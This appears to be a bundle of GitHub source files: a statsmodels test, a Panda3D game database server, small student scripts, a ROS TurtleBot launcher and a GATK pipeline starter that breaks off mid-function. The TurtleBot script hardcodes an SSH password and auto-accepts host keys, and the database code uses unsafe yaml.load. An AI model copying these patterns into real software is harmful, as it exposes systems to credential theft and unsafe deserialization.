DatetimeIndex(start=d1, end=d2, freq=_freq_to_pandas['B']).values\n d = DatetimeIndex(start=d1, end=d2, freq=_freq_to_pandas['D']).values\n w = DatetimeIndex(start=d1, end=d2, freq=_freq_to_pandas['W']).values\n m = DatetimeIndex(start=d1, end=d2, freq=_freq_to_pandas['M']).values\n a = DatetimeIndex(start=d1, end=d2, freq=_freq_to_pandas['A']).values\n q = DatetimeIndex(start=d1, end=d2, freq=_freq_to_pandas['Q']).values\n\n npt.assert_(_infer_freq(w) == 'W-SUN')\n npt.assert_(_infer_freq(a) == 'A-DEC')\n npt.assert_(_infer_freq(q) == 'Q-DEC')\n npt.assert_(_infer_freq(w[:3]) == 'W-SUN')\n npt.assert_(_infer_freq(a[:3]) == 'A-DEC')\n npt.assert_(_infer_freq(q[:3]) == 'Q-DEC')\n npt.assert_(_infer_freq(b[2:5]) == 'B')\n npt.assert_(_infer_freq(b[:3]) == 'D')\n npt.assert_(_infer_freq(b) == 'B')\n npt.assert_(_infer_freq(d) == 'D')\n npt.assert_(_infer_freq(m) == 'M')\n npt.assert_(_infer_freq(d[:3]) == 'D')\n npt.assert_(_infer_freq(m[:3]) == 'M')\n\ndef test_period_index():\n # tests 1285\n from pandas import PeriodIndex\n dates = PeriodIndex(start=\"1/1/1990\", periods=20, freq=\"M\")\n npt.assert_(_infer_freq(dates) == \"M\")\n","repo_name":"drastorguev/financethroughpython","sub_path":"venv/lib/python2.7/site-packages/statsmodels/tsa/base/tests/test_datetools.py","file_name":"test_datetools.py","file_ext":"py","file_size_in_byte":5781,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"54"} +{"seq_id":"42183454283","text":"import os\n\ntry:\n import ujson as json\nexcept:\n import json\n\nimport yaml\nimport pytoml as toml\n\nfrom panda3d.core import UniqueIdAllocator\nfrom panda3d.direct import DCPacker\nfrom realtime import io, types\nfrom direct.directnotify.DirectNotifyGlobal import directNotify\n\nclass DatabaseError(RuntimeError):\n \"\"\"\n An database specific runtime error\n \"\"\"\n\nclass DatabaseFile(object):\n\n def __init__(self, filename):\n self._filename = filename\n self._data = {}\n\n @property\n def filename(self):\n return self._filename\n\n @filename.setter\n def filename(self, filename):\n self._filename = filename\n\n @property\n def data(self):\n return self._data\n\n @data.setter\n def data(self, data):\n self._data = data\n\n def setup(self):\n if not os.path.exists(self._filename):\n self.save()\n\n self.load()\n\n def has_value(self, key):\n return key in self._data\n\n def set_value(self, key, value):\n self._data[key] = value\n self.save()\n\n def get_value(self, key):\n self.load()\n return self._data.get(key)\n\n def set_default_value(self, key, value):\n if self.has_value(key):\n return self.get_value(key)\n\n self.set_value(key, value)\n return value\n\n def close(self):\n self.save()\n\n self._filename = None\n self._data = None\n\n def shutdown(self):\n self.close()\n\nclass DatabaseJSONFile(DatabaseFile):\n\n def save(self):\n with open(self._filename, 'w') as io:\n json.dump(self._data, io, indent=2, sort_keys=True)\n io.close()\n\n def load(self):\n with open(self._filename, 'r') as io:\n self._data = json.load(io)\n io.close()\n\nclass DatabaseYAMLFile(DatabaseFile):\n\n def save(self):\n with open(self._filename, 'w') as io:\n yaml.dump(self._data, io, default_flow_style=False)\n io.close()\n\n def load(self):\n with open(self._filename, 'r') as io:\n self._data = yaml.load(io)\n io.close()\n\nclass DatabaseTOMLFile(DatabaseFile):\n\n def save(self):\n with open(self._filename, 'w') as io:\n toml.dump(self._data, io)\n io.close()\n\n def load(self):\n with open(self._filename, 'r') as io:\n self._data = toml.load(io)\n io.close()\n\nclass DatabaseManager(object):\n\n def __init__(self, file_handler):\n self._files = {}\n self._file_handler = file_handler\n\n self._min_id = config.GetInt('database-min-channels', 1000000000)\n self._max_id = config.GetInt('database-max-channels', 1000001000)\n\n self._directory = config.GetString('database-directory', 'databases/json')\n self._extension = config.GetString('database-extension', '.json')\n\n if not os.path.exists(self._directory):\n os.makedirs(self._directory)\n\n self._tracker = None\n self._tracker_filename = config.GetString('database-tracker', 'next')\n\n self._allocator = None\n\n @property\n def files(self):\n return self._files\n\n @property\n def file_handler(self):\n return self._file_handler\n\n @file_handler.setter\n def file_handler(self, file_handler):\n self._file_handler = file_handler\n\n @property\n def min_id(self):\n return self._min_id\n\n @min_id.setter\n def min_id(self, min_id):\n self._min_id = min_id\n\n @property\n def max_id(self):\n return self._max_id\n\n @max_id.setter\n def max_id(self, max_id):\n self._max_id = max_id\n\n @property\n def directory(self):\n return self._directory\n\n @property\n def extension(self):\n return self._extension\n\n @property\n def tracker(self):\n return self._tracker\n\n @tracker.setter\n def tracker(self, tracker):\n self._tracker = tracker\n\n @property\n def tracker_filename(self):\n return self._tracker_filename\n\n @property\n def allocator(self):\n return self._allocator\n\n @allocator.setter\n def allocator(self, allocator):\n self._allocator = allocator\n\n def setup(self):\n self._tracker = self.open_file(self.get_filename(self._tracker_filename))\n self._min_id = self._tracker.set_default_value('next', self._min_id)\n self._allocator = UniqueIdAllocator(self._min_id, self._max_id)\n\n def has_file(self, filename):\n return filename in self._files\n\n def add_file(self, file):\n if self.has_file(file.filename):\n return\n\n file.setup()\n self._files[file.filename] = file\n\n def remove_file(self, file):\n if not self.has_file(file.filename):\n return\n\n del self._files[file.filename]\n file.shutdown()\n\n def get_file(self, filename):\n return self._files.get(filename)\n\n def get_filename(self, filename):\n return '%s%s' % (os.path.join(self._directory, str(filename)), self._extension)\n\n def open_file(self, filename):\n file = self._file_handler(filename)\n self.add_file(file)\n return file\n\n def close_file(self, file):\n if not isinstance(file, self._file_handler):\n raise DatabaseError('Cannot close file of invalid type: %r, expected: %r!' % (\n file, self._file_handler))\n\n self.remove_file(file)\n\n def shutdown(self):\n for file in self._files:\n self.remove_file(file)\n\nclass DatabaseJSONBackend(DatabaseManager):\n\n def __init__(self):\n DatabaseManager.__init__(self, DatabaseJSONFile)\n\nclass DatabaseYAMLBackend(DatabaseManager):\n\n def __init__(self):\n DatabaseManager.__init__(self, DatabaseYAMLFile)\n\nclass DatabaseTOMLBackend(DatabaseManager):\n\n def __init__(self):\n DatabaseManager.__init__(self, DatabaseTOMLFile)\n\nclass DatabaseServer(io.NetworkConnector):\n notify = directNotify.newCategory('DatabaseServer')\n\n def __init__(self, *args, **kwargs):\n io.NetworkConnector.__init__(self, *args, **kwargs)\n\n self._backend = DatabaseJSONBackend()\n\n @property\n def backend(self):\n return self._backend\n\n @backend.setter\n def backend(self, backend):\n self._backend = backend\n\n def setup(self):\n self._backend.setup()\n\n io.NetworkConnector.setup(self)\n\n def handle_datagram(self, channel, sender, message_type, di):\n if message_type == types.DBSERVER_CREATE_OBJECT:\n self.handle_create_object(sender, di)\n elif message_type == types.DBSERVER_OBJECT_GET_ALL:\n self.handle_object_get_all(sender, di)\n elif message_type == types.DBSERVER_OBJECT_SET_FIELD:\n self.handle_object_set_field(sender, di)\n\n def handle_create_object(self, sender, di):\n context = di.get_uint32()\n dc_id = di.get_uint16()\n field_count = di.get_uint16()\n dc_class = self.dc_loader.dclasses_by_number.get(dc_id)\n\n if not dc_class:\n self.notify.error('Failed to create object: %d context: %d, unknown dclass!' % (\n dc_id, context))\n\n do_id = self._backend.allocator.allocate()\n file_object = self._backend.open_file(self._backend.get_filename(do_id))\n\n file_object.set_value('dclass', dc_class.get_name())\n file_object.set_value('do_id', do_id)\n\n fields = {}\n field_packer = DCPacker()\n field_packer.set_unpack_data(di.get_remaining_bytes())\n\n for _ in xrange(field_count):\n field_id = field_packer.raw_unpack_uint16()\n field = dc_class.get_field_by_index(field_id)\n\n if not field:\n self.notify.error('Failed to unpack field: %d dclass: %s, invalid field!' % (\n field_id, dc_class.get_name()))\n\n field_packer.begin_unpack(field)\n field_args = field.unpack_args(field_packer)\n field_packer.end_unpack()\n\n if not field_args:\n self.notify.error('Failed to unpack field args for field: %d dclass: %s, invalid result!' % (\n field.get_name(), dc_class.get_name()))\n\n fields[field.get_name()] = field_args\n\n for index in xrange(dc_class.get_num_inherited_fields()):\n field_packer = DCPacker()\n field = dc_class.get_inherited_field(index)\n\n if not field:\n continue\n\n if field.get_name() in fields:\n continue\n\n if not field.is_db() or not field.has_default_value():\n continue\n\n field_packer.set_unpack_data(field.get_default_value())\n field_packer.begin_unpack(field)\n field_args = field.unpack_args(field_packer)\n field_packer.end_unpack()\n\n if not field_args:\n self.notify.error('Failed to unpack field args for field: %d dclass: %s, invalid result!' % (\n field.get_name(), dc_class.get_name()))\n\n fields[field.get_name()] = field_args\n\n file_object.set_value('fields', fields)\n\n self._backend.close_file(file_object)\n self._backend.tracker.set_value('next', do_id + 1)\n\n datagram = io.NetworkDatagram()\n datagram.add_header(sender, self.channel,\n types.DBSERVER_CREATE_OBJECT_RESP)\n\n datagram.add_uint32(context)\n datagram.add_uint32(do_id)\n self.handle_send_connection_datagram(datagram)\n\n def handle_object_get_all(self, sender, di):\n context = di.get_uint32()\n do_id = di.get_uint32()\n file_object = self._backend.open_file(self._backend.get_filename(do_id))\n\n if not file_object:\n self.notify.warning('Failed to get fields for object: %d context: %d, unknown object!' % (\n do_id, context))\n\n return\n\n dc_name = file_object.get_value('dclass')\n dc_class = self.dc_loader.dclasses_by_name.get(dc_name)\n\n if not dc_class:\n self.notify.warning('Failed to query object: %d context: %d, unknown dclass: %s!' % (\n do_id, context, dc_name))\n\n return\n\n fields = file_object.get_value('fields')\n\n if not fields:\n self.notify.warning('Failed to query object: %d context %d, invalid fields!' % (\n do_id, context))\n\n return\n\n datagram = io.NetworkDatagram()\n datagram.add_header(sender, self.channel,\n types.DBSERVER_OBJECT_GET_ALL_RESP)\n\n datagram.add_uint32(context)\n datagram.add_uint8(1)\n\n field_packer = DCPacker()\n field_count = 0\n for field_name, field_args in fields.items():\n field = dc_class.get_field_by_name(field_name)\n\n if not field:\n self.notify.warning('Failed to query object %d context: %d, unknown field: %s' % (\n do_id, context, field_name))\n\n return\n\n field_packer.raw_pack_uint16(field.get_number())\n field_packer.begin_pack(field)\n field.pack_args(field_packer, field_args)\n field_packer.end_pack()\n field_count += 1\n\n self._backend.close_file(file_object)\n\n datagram.add_uint16(dc_class.get_number())\n datagram.add_uint16(field_count)\n datagram.append_data(field_packer.get_string())\n self.handle_send_connection_datagram(datagram)\n\n def handle_object_set_field(self, sender, di):\n do_id = di.get_uint32()\n file_object = self._backend.open_file(self._backend.get_filename(do_id))\n\n if not file_object:\n self.notify.warning('Failed to set fields for object: %d, unknown object!' % (\n do_id))\n\n return\n\n dc_name = file_object.get_value('dclass')\n dc_class = self.dc_loader.dclasses_by_name.get(dc_name)\n\n if not dc_class:\n self.notify.warning('Failed to set fields for object: %d, unknown dclass: %s!' % (\n do_id, dc_name))\n\n return\n\n fields = file_object.get_value('fields')\n\n if not fields:\n self.notify.warning('Failed to set fields for object: %d, invalid fields!' % (\n do_id))\n\n return\n\n field_packer = DCPacker()\n field_packer.set_unpack_data(di.get_remaining_bytes())\n field_id = field_packer.raw_unpack_uint16()\n field = dc_class.get_field_by_index(field_id)\n\n if not field:\n self.notify.error('Failed to unpack field: %d dclass: %s, invalid field!' % (\n field_id, dc_class.get_name()))\n\n field_packer.begin_unpack(field)\n field_args = field.unpack_args(field_packer)\n field_packer.end_unpack()\n\n if not field_args:\n self.notify.error('Failed to unpack field args for field: %d dclass: %s, invalid result!' % (\n field.get_name(), dc_class.get_name()))\n\n fields[field.get_name()] = field_args\n file_object.set_value('fields', fields)\n\n self._backend.close_file(file_object)\n\n def shutdown(self):\n self._backend.shutdown()\n\n io.NetworkConnector.shutdown(self)\n","repo_name":"cmarshall108/toontown-otp-original","sub_path":"realtime/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":13163,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"20847888692","text":"'''\nScript: WK-2 Starter Script\nAuthor: Kristin Skipper\nDate: 09/03/2022\nVersion: \nPurpose: Search a file directory and iterate through to see each files path, size and Mac Times\n'''\nfrom prettytable import PrettyTable\n\n''' IMPORT STANDARD LIBRARIES '''\nimport os # File System Methods\nimport time # Time Conversion Methods\n\n''' IMPORT 3RD PARTY LIBRARIES '''\n# NONE\n\n\n''' LOCAL FUNCTIONS '''\n\n\ndef GetFileMetaData(fileName):\n ''' \n obtain filesystem metadata\n from the specified file\n specifically, fileSize and MAC Times\n \n return True, None, fileSize and MacTimeList\n '''\n try:\n\n metaData = os.stat(fileName) # Use the stat method to obtain meta data\n fileSize = metaData.st_size # Extract fileSize and MAC Times\n timeLastAccess = metaData.st_atime\n timeLastModified = metaData.st_mtime\n timeCreated = metaData.st_ctime\n\n readableTimeLastAccess = makeTimeReadable(timeLastAccess)\n readableTimeLastModified = makeTimeReadable(timeLastModified)\n readableTimeCreated = makeTimeReadable(timeCreated)\n readableTimeList = [readableTimeLastAccess, readableTimeLastModified, # Group the human-readable MAC Times in a List\n readableTimeCreated]\n return True, None, fileSize, readableTimeList\n\n except Exception as err:\n return False, str(err), None, None\n\n\ndef makeTimeReadable(timeTOChange): #function to make time human readable\n timeToModify = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.gmtime(timeTOChange))\n return timeToModify\n\n\n''' MAIN ENTRY POINT '''\n\nif __name__ == '__main__':\n\n print(\"Skipper-Kristin-WK-2-Scripting-Assignment\\n\")\n print(\"First Script: Obtain File Meta Data\\n\")\n # targetFile = input(\"Enter File Path to Process: \")\n while True:\n targetDirectory = input(\"\\nPlease Enter a Directory: \")\n if os.path.isdir(targetDirectory):\n\n print(\"\\nProcessing: \", targetDirectory)\n\n dirEntries = os.listdir(targetDirectory)\n for eachEntry in dirEntries:\n\n fullPath = os.path.join(targetDirectory, eachEntry)\n success, errInfo, fileSize, timeList = GetFileMetaData(fullPath)\n\n print(\"=\" * 100)\n\n if success:\n print(\"Success: \", fullPath)\n print(\"File Size: \", fileSize)\n print(\"UTC_LastAccessed: \", timeList[0])\n print(\"UTC_LastModified: \", timeList[1])\n print(\"UTC_Created: \", timeList[2])\n else:\n print(\"Fail: \", fullPath, \"Exception = \", errInfo)\n print(eachEntry)\n else:\n print(\"\\nInvalid Directory ... Please Try Again\\n\")\n\nprint(\"\\nScript End\")\n","repo_name":"lifefromashes/pythonAssignment2","sub_path":"pythonClassUniversityOfArizon/Skipper-Kristin-WK-2.py","file_name":"Skipper-Kristin-WK-2.py","file_ext":"py","file_size_in_byte":2811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36286167221","text":"#Uses python3\nimport sys\ndef max_dot_product(a, b):\n revenue = 0\n for i in range(len(a)):\n revenue += max(a) * max(b)\n a.pop(a.index(max(a)))\n b.pop(b.index(max(b)))\n return revenue\nif __name__ == '__main__':\n input = sys.stdin.read()\n data = list(map(int, input.split()))\n n = data[0]\n a = data[1:(n + 1)]\n b = data[(n + 1):]\n print(max_dot_product(a, b))","repo_name":"cnkyrpsgl/Coursera_2018_Data_Structures_and_Algorithms","sub_path":"algorithmic toolbox/assignment2_greedy_algorithms/dot_product.py","file_name":"dot_product.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"54"} +{"seq_id":"5911357091","text":"import requests\nfrom bs4 import BeautifulSoup\n\nurl = 'https://en.wikipedia.org/wiki/Deep_learning'\n\nresponse = requests.get(url) # Connect to the URL\n\n# Parse HTML and save to BeautifulSoup object¶\nsoup = BeautifulSoup(response.text, \"html.parser\")\n\n# print(soup.prettify())\nheading = soup.find(id='firstHeading').string\n\nprint(heading)\n\n# print(soup.find_all('a'))\nall_links = soup.find_all('a')\nf1 = open(\"output_links.txt\", \"w\")\nfor link in all_links:\n linkhref = link.get('href')\n f1.write(str(linkhref) + '\\n')","repo_name":"sm3mb/Python-and-Deep-Learning-Programming","sub_path":"ICP3/webScraping.py","file_name":"webScraping.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18152008477","text":"\nimport os\nimport time\nimport paramiko\n\n# bc its saved locally, do rosrun\n#cd desktop\n\n#os.system('gnome-terminal -- rosrun map_server map_saver -f my_map')\n#time.sleep(6)\n#rosrun map_server map_saver -f my_map\n\n#apply pgm map filtering from nav onto pgm\nos.system('gnome-terminal -- python3 PGMReader.py')\ntime.sleep(6)\n\n#apply through crop map\nos.system('gnome-terminal -- python3 Pathable_Cell_for_Map.py')\ntime.sleep(6)\n\n\n#send over 'croppedmap.png' to turtlebot for mc website\nos.system('gnome-terminal -- scp ~/modified_map.png ubuntu@192.168.8.209:/home/ubuntu/team2/nodeServer/assets')\n\ntime.sleep(4)\n# Launch roscore in a new terminal\nos.system('gnome-terminal -- roscore')\n\n# Wait for roscore to start up\ntime.sleep(5)\n\n# Launch turtlebot3_robot.launch in a new terminal\nssh = paramiko.SSHClient()\nssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n\nssh.connect('192.168.8.209', username='ubuntu', password='turtlebot')\n\nshell = ssh.invoke_shell()\nshell.send('roslaunch turtlebot3_bringup turtlebot3_robot.launch\\n')\n\n# Wait for turtlebot3_robot.launch to start up\ntime.sleep(8)\n\n# Launch turtlebot3_slam.launch in a new terminal\nos.system('gnome-terminal -- roslaunch turtlebot3_navigation turtlebot3_navigation.launch map_file:=$HOME/map.yaml')\n\n\nwhile True:\n\ttime.sleep(1)\n","repo_name":"raziehyria/tbsavepmg","sub_path":"NavGoals.py","file_name":"NavGoals.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8581319218","text":"\"\"\"\n### usage\n# usage: 00_start-gatk_pipeline.py -p PARENTDIR [-e EMAIL [-n EMAIL_OPTIONS]]\n###\n\n### fix\n# dicts with samps as keys assume adaptors, ref, rglb, etc are same for reseqs\n# (the second file with samp as key will overwrite the last)\n# as of now, that hasn't created an issue\n###\n\n### TODO\n# assert 0 <= input maf <= 1\n###\n\"\"\"\n\nimport os, sys, distutils.spawn, subprocess, shutil, argparse, pandas as pd\nimport balance_queue\nfrom os import path as op\nfrom subprocess import Popen, PIPE\nfrom coadaptree import fs, pkldump, uni, luni, makedir, askforinput, Bcolors\n\n\ndef get_rgid(r1):\n \"\"\"If RGID is blank, print out the output that the pipeline would otherwise use.\"\"\"\n p1 = Popen(['zcat',r1], stdout=PIPE)\n p2 = Popen(['head', '-n1'], stdin=p1.stdout, stdout=PIPE)\n return '_'.join(p2.communicate()[0].split()[0].decode('utf-8').split('\\n')[0].split(\":\")[:4])\n\n\ndef create_sh(pooldirs, poolref, parentdir):\n # create sh files\n print(Bcolors.BOLD + '\\nwriting sh files' + Bcolors.ENDC)\n for pooldir in pooldirs:\n pool = op.basename(pooldir)\n print(Bcolors.BOLD + '\\npool = %s' % pool + Bcolors.ENDC)\n ref = poolref[pool]\n print('\\tsending pooldir and ref to 01_trim-fastq.py')\n subprocess.call([shutil.which('python'),\n op.join(os.environ['HOME'], 'gatk_pipeline/01_trim-fastq.py'),\n pooldir,\n ref])\n print(\"\\n\")\n balance_queue = op.join(os.environ['HOME'], 'gatk_pipeline/balance_queue.py')\n subprocess.call([sys.executable, balance_queue, 'trim', parentdir])\n\n\ndef get_datafiles(parentdir, f2pool, data):\n # get list of files from datatable, make sure they exist in parentdir, create symlinks in /parentdir//\n print(Bcolors.BOLD + '\\nchecking for existance of fastq files in datatable.txt' + Bcolors.ENDC)\n files = [f for f in fs(parentdir) if 'fastq' in f and 'md5' not in f]\n datafiles = data['file_name_r1'].tolist()\n for x in data['file_name_r2'].tolist():\n datafiles.append(x)\n if len(files) > len(datafiles):\n desc = 'more'\n if len(files) < len(datafiles):\n desc = 'less'\n try:\n print(Bcolors.WARNING +\n 'WARN: there are %s fastq files in %s than in datatable.txt' % (desc, parentdir) +\n Bcolors.ENDC)\n print(Bcolors.BOLD + 'Here are the files in %s' % parentdir + Bcolors.ENDC)\n [print(op.basename(x)) for x in files]\n print(Bcolors.BOLD + 'Here are the files in datatable.txt' + Bcolors.ENDC)\n [print(x) for x in datafiles]\n askforinput()\n\n except NameError:\n pass\n\n for f in datafiles:\n src = op.join(parentdir, f)\n if not op.exists(src):\n # make sure file in datatable exists\n print(\"could not find %s in %s\\nmake sure file_name in datatable is its basename\" % (f, parentdir))\n print(\"(symlinks in parentdir to fastq files in other dirs works fine, and is the intentional use)\")\n sys.exit(1)\n pooldir = op.join(parentdir, f2pool[f])\n dst = op.join(pooldir, f)\n if not op.exists(dst):\n # easy to visualize in cmdline if script is finding correct group of files by ls-ing pooldir\n os.symlink(src, dst)\n\n\ndef make_pooldirs(data, parentdir):\n # make pool dirs\n print(Bcolors.BOLD + \"\\nmaking pool dirs\" + Bcolors.ENDC)\n pools = uni(data['pool_name'].tolist())\n pooldirs = []\n for p in pools:\n DIR = op.join(parentdir, p)\n if op.exists(DIR):\n print(\"The pooldir already exists, this could overwrite previous data: %s\" % DIR)\n askforinput()\n pooldirs.append(makedir(DIR))\n makedir(op.join(DIR, 'shfiles'))\n return pooldirs\n\n\ndef handle_rg_fails(failing, warning, parentdir, data):\n if len(failing) > 0:\n print(Bcolors.FAIL + 'FAIL: The following samples have blank RG info.' + Bcolors.ENDC)\n for fail in failing:\n print(Bcolors.FAIL + \"FAIL: %s\" % fail + Bcolors.ENDC)\n print('exiting 00_start-pipeline.py')\n exit()\n if len(warning) > 0:\n outputs = []\n for row in data.index:\n samp = data.loc[row, 'sample_name']\n if samp in warning:\n r1 = op.join(parentdir, data.loc[row, 'file_name_r1'])\n outputs.append(\"\\t\\t%s\\t%s\" % (samp, get_rgid(r1)))\n print(Bcolors.WARNING + '\\n\\n\\tWARN: at least one of the samples has a blank RGID in the datatable.\\n' +\n '\\tWARN: If RGPU is also blank, the pipeline will assign RGPU as: $RGID.$RGLB\\n' +\n '\\tWARN: The pipeline will automatically assign the following RGIDs.\\n' +\n '\\n\\t\\tsample_name\\tassigned_RGID' +\n Bcolors.ENDC)\n for output in outputs:\n print(Bcolors.WARNING + output + Bcolors.ENDC)\n askforinput(tab='\\t', newline='')\n\n\ndef read_datatable(parentdir):\n # read in the datatable, save info for later\n datatable = op.join(parentdir, 'datatable.txt')\n if not op.exists(datatable):\n print(Bcolors.FAIL + '''FAIL: the datatable is not in the necessary path: %s\nFAIL: exiting 00_start-gatk_pipeline.py''' % datatable + Bcolors.ENDC)\n sys.exit(3)\n print(Bcolors.BOLD + 'reading datatable, getting fastq info' + Bcolors.ENDC)\n data = pd.read_csv(datatable, sep='\\t')\n rginfo = {} # key=sampname vals=rginfo\n samp2pool = {} # key=samp val=pool\n poolref = {} # key=pool val=ref.fa\n ploidy = {} # key=pool val=ploidy\n poolsamps = {} # key=pool val=sampnames\n f2samp = {} # key=f val=samp\n f2pool = {} # key=f val=pool\n adaptors = {} # key=samp val={'r1','r2'} val=adaptor\n warning = [] # whether to print out warning about optional RG info\n failing = [] # whether to print out failing about required RG info\n for row in data.index:\n samp = data.loc[row, 'sample_name']\n adaptors[samp] = {'r1': data.loc[row, 'adaptor_1'],\n 'r2': data.loc[row, 'adaptor_2']}\n pool = data.loc[row, 'pool_name']\n pooldir = op.join(parentdir, pool)\n print('\\t{}\\tsamp = {}\\tpool = {}'.format(row, samp, pool))\n if pool not in poolsamps:\n poolsamps[pool] = []\n if samp not in poolsamps[pool]:\n poolsamps[pool].append(samp)\n if samp in samp2pool:\n if samp2pool[samp] != pool:\n print(Bcolors.FAIL + 'FAIL: there are duplicate sample names with \\\ndifferent pool assignments: %s' % samp + Bcolors.ENDC)\n print('exiting')\n exit()\n samp2pool[samp] = pool\n df = data[data['pool_name'] == pool].copy()\n if not luni(df['ploidy']) == 1:\n print(Bcolors.WARNING + \n \"The ploidy values for some elements with pool name '%s' are not the same.\" % pool +\n \"\\n\\tHere are the ploidy values: %s\" % uni(df['ploidy']) +\n Bcolors.ENDC)\n askforinput()\n if samp not in ploidy:\n ploidy[samp] = data.loc[row, 'ploidy']\n if pool in poolref:\n if not poolref[pool] == data.loc[row, 'ref']:\n print(\"ref genome for samples in %s pool seems to have different paths in datatable.txt\" % pool)\n sys.exit(1)\n else:\n ref = data.loc[row, 'ref']\n if not op.exists(ref):\n print('ref for %s does not exist in path: %s' % (samp, ref))\n print('exiting 00_start-gatk_pipeline.py')\n exit()\n needed = []\n for suffix in ['.dict', '.amb', '.ann', '.bwt', '.fai', '.pac', '.sa']:\n refext = ref + suffix if suffix != '.dict' else ref.split('.fa')[0] + suffix\n if not op.exists(refext):\n needed.append(refext)\n if len(needed) > 0:\n print(Bcolors.FAIL + \n 'FAIL: the following extensions of the reference are needed to continue, \\\nplease create these files' + \n Bcolors.ENDC)\n for n in needed:\n print(Bcolors.FAIL + n + Bcolors.ENDC)\n print('exiting')\n exit()\n printneeded = False\n intdir = op.join(op.dirname(ref), 'intervals')\n if not op.exists(intdir):\n printneeded = True\n elif len([f for f in fs(intdir) if '.list' in f and 'batch_' in f]) == 0:\n printneeded = True\n if printneeded is True:\n print(Bcolors.FAIL + \n 'FAIL: either the intervals dir doesn not exist or there are not batch_interval.list files\\\n\\nFAIL: intdir should be here: %s\\\n\\nFAIL: interval filenames should be of the form \"batch_uniqueIDENTIFIER.list\"\\\n\\nFAIL: these files must begin with \"batch\" followed by one underscore followed\\\n\\nFAIL: by \"uniqueIDENTIFIER\" which can be any string that does not include\\\n\\nFAIL: an underscore (eg chrXIII or 0013 for batch_0013.list).' % intdir + Bcolors.ENDC)\n exit()\n poolref[pool] = ref\n rginfo[samp] = {}\n for col in ['rglb', 'rgpl', 'rgsm']: # rg info columns\n rginfo[samp][col] = data.loc[row, col]\n for f in [data.loc[row, 'file_name_r1'], data.loc[row, 'file_name_r2']]:\n if \"__\" in f:\n print(Bcolors.BOLD + \n Bcolors.FAIL + \n \"FAIL: file names cannot have double underscores, replace __ with _ (single)\" + \n Bcolors.END)\n exit()\n f2pool[f] = pool\n f2samp[op.join(pooldir, f)] = samp\n\n # hangle RG info\n rginfo[samp] = {}\n # required RG info\n for col in ['rglb', 'rgpl', 'rgsm']: # rg info columns\n if not data.loc[row, col] == data.loc[row, col]:\n failing.append('%s\\t%s' % (samp, col))\n rginfo[samp][col] = data.loc[row, col]\n # optional RG info\n for col in ['rgid', 'rgpu']:\n if data.loc[row, col] != data.loc[row, col]:\n # if nan\n rginfo[samp][col] = None\n if samp not in warning:\n warning.append(samp)\n else:\n rginfo[samp][col] = data.loc[row, col]\n\n # RG info failing/warnings\n handle_rg_fails(failing, warning, parentdir, data)\n\n pkldump(rginfo, op.join(parentdir, 'rginfo.pkl'))\n pkldump(ploidy, op.join(parentdir, 'ploidy.pkl'))\n pkldump(f2samp, op.join(parentdir, 'f2samp.pkl'))\n pkldump(poolsamps, op.join(parentdir, 'poolsamps.pkl'))\n pkldump(poolref, op.join(parentdir, 'poolref.pkl'))\n pkldump(adaptors, op.join(parentdir, 'adaptors.pkl'))\n pkldump(samp2pool, op.join(parentdir, 'samp2pool.pkl'))\n return data, f2pool, poolref\n\n\ndef check_reqs(parentdir):\n \"\"\"Check for assumed exports.\"\"\"\n \n print(Bcolors.BOLD + '\\nChecking for exported variables' + Bcolors.ENDC)\n variables = ['SLURM_ACCOUNT', 'SBATCH_ACCOUNT', 'SALLOC_ACCOUNT', 'PYTHONPATH', 'SQUEUE_FORMAT']\n \n # check to see if bash_variables file has been created\n if not op.exists(op.join(parentdir, 'bash_variables')):\n print('\\tCould not find bash_variables file in parentdir. Please create this file and add \\\nin variables from README (eg SLURM_ACCOUNT, SQUEUE_FORMAT, etc). See example in $HOME/gatk-pipeline.')\n else:\n with open(op.join(parentdir, 'bash_variables')) as bv:\n text = bv.read().split(\"\\n\")\n needed = []\n for var in variables:\n found = False\n for line in text:\n if var in line:\n found = True\n break\n if found is False:\n needed.append(var)\n if len(needed) > 0:\n print(Bcolors.FAIL + '\\tFAIL: not all bash variables were found in parentdir/bash_variables file.' + Bcolors.ENDC)\n print(Bcolors.FAIL + '\\tFAIL: the following variables must be present' + Bcolors.ENDC)\n for var in needed:\n print(Bcolors.FAIL + '\\t%s' % var + Bcolors.ENDC)\n print('exiting pipeline')\n \n # check to see if bash_variables file has been sourced\n for var in variables:\n try:\n print('\\t%s = %s' % (var, os.environ[var]))\n except KeyError:\n print(Bcolors.FAIL + '\\tCould not find %s in exported vars\\n\\texport this var in parentdir/bash_variables \\\nso it can be used later in gatk_pipeline, then source this file before restarting pipeline.' % var + Bcolors.ENDC)\n print('\\texiting 00_start-gatk_pipeline.py')\n exit()\n\n # make sure an environment can be activated (activation assumed to be in parentdir/bash_variables)\n for exe in ['activate']:\n if distutils.spawn.find_executable(exe) is None:\n print(Bcolors.FAIL + '\\tcould not find %s in $PATH\\nexiting 00_start-gatk_pipeline.py' % exe\n + Bcolors.ENDC)\n if exe == 'activate':\n print(Bcolors.FAIL + '\\t\\t(the lack of activate means that the python env is not correctly installed)'\n + Bcolors.ENDC)\n exit()\n # make sure pipeline can be accessed via $HOME/gatk_pipeline\n if not op.exists(op.join(os.environ['HOME'], 'gatk_pipeline')):\n print('\\tcould not find gatk_pipeline via $HOME/gatk_pipeline\\n\\texiting 00_start-gatk_pipeline.py')\n exit()\n\n\ndef check_pyversion():\n # check python version\n pyversion = float(str(sys.version_info[0]) + '.' + str(sys.version_info[1]))\n if not pyversion >= 3.6:\n text = '''FAIL: You are using python %s. This pipeline was built with python 3.7+.\nFAIL: You will need at least python v3.6+.\nFAIL: exiting 00_start-gatk_pipeline.py\n ''' % pyversion\n print(Bcolors.BOLD + Bcolors.FAIL + text + Bcolors.ENDC)\n exit()\n\n\ndef get_pars():\n choices = ['all', 'fail', 'begin', 'end', 'pipeline-finish']\n parser = 